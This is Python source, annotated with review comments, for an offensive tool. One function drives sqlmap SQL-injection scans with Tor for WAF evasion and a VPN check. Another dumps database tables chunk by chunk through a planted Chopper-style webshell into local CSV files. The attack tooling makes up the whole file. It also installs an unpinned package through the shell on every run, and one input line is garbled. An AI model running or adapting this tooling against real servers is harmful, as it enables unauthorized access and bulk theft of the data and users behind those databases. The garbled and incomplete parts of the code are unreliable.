def sqli_scan(target):
    """Interactively drive a sqlmap run against *target* and return its log.

    Prompts (with a timeout via get_input_intime) for whether to use tor,
    whether to send POST requests, and which of two sqlmap wrappers to run,
    waits until checkvpn() reports the VPN is up, then runs the chosen
    wrapper.  Afterwards it reads ``homePath + "/.sqlmap/output/<domain>/log``
    and returns its content, or the fixed string "Sorry,no sqli vul." when the
    log is missing or empty.

    Args:
        target: URL in "http..." form (not a bare domain); the last path
            segment after splitting on "/" is used as the sqlmap output
            directory name.

    Returns:
        str: the sqlmap log content, or "Sorry,no sqli vul.".

    Notes:
        get_input_intime, checkvpn, sqlmap_crawl, sqlmap_g_nohuman, homePath
        and http_domain_sqli_scaned are defined elsewhere in this module and
        are not visible here.  The source was collapsed onto one line; the
        indentation below is a reconstruction (see the NOTE at the
        ``num == str(2)`` branch).
    """
    # Only the target itself is scanned for SQLi; side-sites and sub-sites are not considered.
    # target must be in http... form, not a bare domain.
    http_domain = target
    print('''do you want use 'tor' service in your sqli action? sometimes when your network is not very well, is not a good idea to use tor,but when your targets has waf,use tor is better. input Y(y) or N(n) default [N]:>''', end='')
    print('\n')
    # Default 'n' after a 5 second wait (assumed from the call shape; get_input_intime is not visible here).
    choose_tor = get_input_intime('n', 5)
    print('\n')
    if choose_tor == 'Y' or choose_tor == 'y':
        bool_tor = True
    else:
        bool_tor = False
    print('''do you want use 'post' request in your sqli scan? sometimes when you want a faster speed, use 'get' request is enough,do no need to use 'post' request,meanwhile,when there exists some waf, use 'get' and 'post' will try too many times's request which will make the waf block you ip,so in these cases,do not use 'post' request, but use only 'get' request without 'post' request,the number of sqli points will be less in the common sense, input Y(y) or N(n) default [N]:>''', end='')
    print('\n')
    choose_post = get_input_intime('n', 5)
    print('\n')
    if choose_post == 'Y' or choose_post == 'y':
        post_or_not = True
    else:
        post_or_not = False
    print('''there are two kinds of sqli blew: 1.use "sqlmap_crawl" 2.use "sqlmap-g-nohuman" input your number here:''', end='')
    print('\n')
    # Compared as a string below so that an int default and a typed string both match.
    num = str(get_input_intime(1, 5))
    print('\n')
    if num == str(1):
        # Poll once per second until the VPN is up, then run a single scan.
        while(1):
            if checkvpn():
                # Regardless of scan_way's value, the main target is scanned for SQLi first.
                sqlmap_crawl(http_domain, bool_tor, post_or_not)
                break
            else:
                time.sleep(1)
                print("vpn is off,scan will continue till vpn is on")
    if num == str(2):
        while(1):
            if checkvpn():
                # Regardless of scan_way's value, the main target is scanned for SQLi first.
                # http_domain_sqli_scaned is not defined in this function; presumably a module global.
                if http_domain_sqli_scaned == 0:
                    sqlmap_g_nohuman(http_domain, bool_tor, post_or_not)
                # NOTE(review): the original placement of this break is not recoverable from the
                # collapsed source; it may belong inside the inner if, which would make the loop
                # spin while http_domain_sqli_scaned != 0 -- confirm against the original file.
                break
            else:
                time.sleep(1)
                print("vpn is off,scan will continue till vpn is on")
    # sqlmap names its output directory after the host; the last "/"-separated segment is used here.
    domain = http_domain.split("/")[-1]
    logFile = homePath + "/.sqlmap/output/%s/log" % domain
    content = ""
    if os.path.exists(logFile) == True:
        # "r+" opens read/write although only a read happens; "r" would suffice.
        with open(homePath + "/.sqlmap/output/%s/log" % domain, "r+") as f:
            content = f.read()
    if len(content) != 0:
        return content
    else:
        return "Sorry,no sqli vul."
def main():
    """Program entry point: interactive table dump through a webshell.

    Reads the webshell URL and password, chooses one of two modes, and in the
    second mode loads HTTP headers and POST parameters from two user-supplied
    files.  It then loops: lists databases and tables via query(), asks for a
    table, row total and per-request row count, and appends the returned rows
    to ``<tableName>.csv`` in the current directory using post_requests().

    Side effects:
        * Runs ``pip3 install exp10it -U`` through os.system() on every start
          (see the NOTE on that line).
        * Writes module globals listed in the ``global`` statement.
        * Appends to ``<tableName>.csv``.

    Notes:
        query, get_input_intime, getPrimaryColumnName, HandlePostData,
        post_requests and the globals count, countOfTableDict and start are
        defined elsewhere in this module and are not visible here.  The
        source was collapsed onto one line and contains an extraction
        artifact (``******``) on the webshell-password line; the indentation
        below is a reconstruction.
    """
    # NOTE(review): an unpinned package is installed from the network through the
    # shell on every run; this runs arbitrary code from the package index and its
    # result is not checked.  Pin the version and do the install once at setup time.
    os.system("pip3 install exp10it -U")
    global httpHeaderContent, postData, headerFile, postDataFile, everyQueryCount, count, dbHost, dbUser, dbPass, dbName, tableName, url, chopperPass, mode, countOfTableDict, primaryColumnName
    # count is the index of the current query (how many queries have been made).
    # count and countOfTableDict are read below but never initialised here; assumed
    # to be set at module level -- TODO confirm.
    httpHeaderContent = {}
    postData = {}
    url = input("please input webshell url:")
    # NOTE(review): "******" below is an extraction artifact in this copy of the file;
    # the text between the two string literals (most likely the closing ")" of input()
    # and a following print( call) is not recoverable from this page.
    chopperPass = input("please input your webshell pass:"******"1.不抓包模式\nor\n2.抓包后模式?\n不抓包模式目前只测试过php+mysql组合 抓包后模式功能更强大\ [但是需要用charles做sock5代理,proxfier设置chopper的代理为charles提供的对应的代理地址,用charles抓到chopper\ 的包后按照代码中要求的格式保存到下面要提供的文件中]\n请选择对应模式序号,默认选择1")
    mode = get_input_intime(1)
    # NOTE(review): mode is compared as str here but as int (mode == 1) in the loop
    # below; if get_input_intime returns a string the two branches disagree.
    if str(mode) == "1":
        dbHost = input("please input db host:\n")
        dbUser = input("please inpuot db user:\n")
        dbPass = input("please input db pass:\n")
        dbName = input("please input db name:\n")
    else:
        headerFile = input("please input your post header file abspath,header头要求如代码中的示例格式:\n")
        postDataFile = input("please input your post data file abspath,post数据要求如代码中的示例格式:\n")
        # One "Name: value" header per line; value is everything after the first ":".
        # "r+" is read/write although only reads happen; the "\s" pattern is a non-raw
        # string (SyntaxWarning on recent Pythons) -- r"\s$" is the intended form.
        with open(headerFile, "r+") as f:
            for eachLine in f:
                eachLine = re.sub("\s$", "", eachLine)
                eachHeaderParam = eachLine.split(":")[0]
                eachHeaderParamValue = eachLine[len(eachHeaderParam) + 1:]
                httpHeaderContent[eachHeaderParam] = eachHeaderParamValue
        # One "name=value" POST parameter per line; value is everything after the first "=".
        with open(postDataFile, "r+") as f:
            for eachLine in f:
                eachLine = re.sub("\s$", "", eachLine)
                eachPostParam = eachLine.split("=")[0]
                eachPostParamValue = eachLine[len(eachPostParam) + 1:]
                postData[eachPostParam] = eachPostParamValue
    while 1:
        if mode == 1:
            pass
        else:
            # In the captured-request mode the database name is taken from the 'z4' POST field.
            dbName = postData['z4']
        result = query("show databases")
        print("you are accessed on below database:\n")
        # Drop the first line (column header) of the tabular result.
        pureData = result[len(result.split("\r\n")[0] + "\r\n"):]
        # NOTE(review): "list" shadows the builtin for the rest of this function.
        list = re.findall("([^\s\|]+)", pureData)
        for eachDbname in list:
            print(eachDbname)
        dbName = input("\nplease input db name you want to dump data from:\n")
        print("\nthe db you choosed has below tables:\n")
        # Table row counts are computed once and cached in the countOfTableDict global.
        if countOfTableDict == {}:
            result = query("show tables")
            pureData = result[len(result.split("\r\n")[0] + "\r\n"):]
            list = re.findall("([^\s\|]+)", pureData)
            for eachTableName in list:
                # Table name is interpolated straight into the statement (no quoting).
                result = query("select count(*) from %s" % eachTableName)
                entryNum = re.search("(\d+)", result).group(1)
                countOfTableDict[eachTableName] = int(entryNum)
                #print(eachTableName)
        for eachTableName in countOfTableDict:
            print(eachTableName + "[%d]" % int(countOfTableDict[eachTableName]))
        tableName = input("\nplease input table name you want to dump:\n")
        totalDataCount = int(input("please input how much data there are[想dump多少条数据?输入0代表dump整个表的内容]:\n"))
        everyQueryCount = int(input("please input how much data do you want to query each time[每次要查询多少条数据?]:\n"))
        # Total number of queries to make (integer division; a remainder is not fetched).
        # everyQueryCount == 0 raises ZeroDivisionError here.
        totalQueryCount = totalDataCount // everyQueryCount
        # Try to pick a primary-key column usable for paging the dump.
        primaryColumnName = getPrimaryColumnName()
        if totalQueryCount != 0:
            for i in range(totalQueryCount):
                # Updates the query parameters after each query.
                HandlePostData()
                result = post_requests(url, data=postData, headers=httpHeaderContent)
                # Strip the 3-character framing on both ends of the response body.
                html = result.content.decode("utf8")[3:-3]
                #print(html)
                # Data from Caidao (Chopper) uses \r\n line endings; POST data from a "big shell"
                # may use \n, and other Chopper versions may also use \n.  The SQL data returned
                # here uses \r\n; adjust this for the other cases.
                firstLine = html.split("\r\n")[0]
                # The first line starts with "->|" and the last line ends with "|<-".
                firstLine2write = firstLine[3:]
                data2write = html[len(firstLine + "\r\n"):-3]
                with open("%s.csv" % tableName, "a+") as f:
                    # Header row is written only before the very first chunk.
                    if count == 0:
                        f.write(firstLine2write + "\r\n")
                    # 2000 rows are queried per request here; the matching value in the POST
                    # data file must be changed to the per-query row count.
                    count += 1
                    num = count * everyQueryCount
                    print("查询了%d条数据" % num)
                    f.write("\r\n下面是到%d条数据:\r\n" % num)
                    f.write(data2write)
        else:
            # totalDataCount == 0 means "dump the whole table": loop until interrupted.
            while 1:
                # Updates the query parameters after each query.
                HandlePostData()
                result = post_requests(url, data=postData, headers=httpHeaderContent)
                html = result.content.decode("utf8")[3:-3]
                #print(html)
                # Data from Caidao (Chopper) uses \r\n line endings; POST data from a "big shell"
                # may use \n, and other Chopper versions may also use \n.  The SQL data returned
                # here uses \r\n; adjust this for the other cases.
                firstLine = html.split("\r\n")[0]
                # The first line starts with "->|" and the last line ends with "|<-".
                firstLine2write = firstLine[3:]
                data2write = html[len(firstLine + "\r\n"):-3]
                with open("%s.csv" % tableName, "a+") as f:
                    if count == 0:
                        f.write(firstLine2write + "\r\n")
                    # 2000 rows are queried per request here; the matching value in the POST
                    # data file must be changed to the per-query row count.
                    count += 1
                    # NOTE(review): start is not defined or declared global in this function;
                    # presumably maintained by HandlePostData() -- NameError otherwise.
                    num = start + everyQueryCount - 1
                    print("查询了%d条数据" % num)
                    f.write("\r\n下面是到%d条数据:\r\n" % num)
                    f.write(data2write)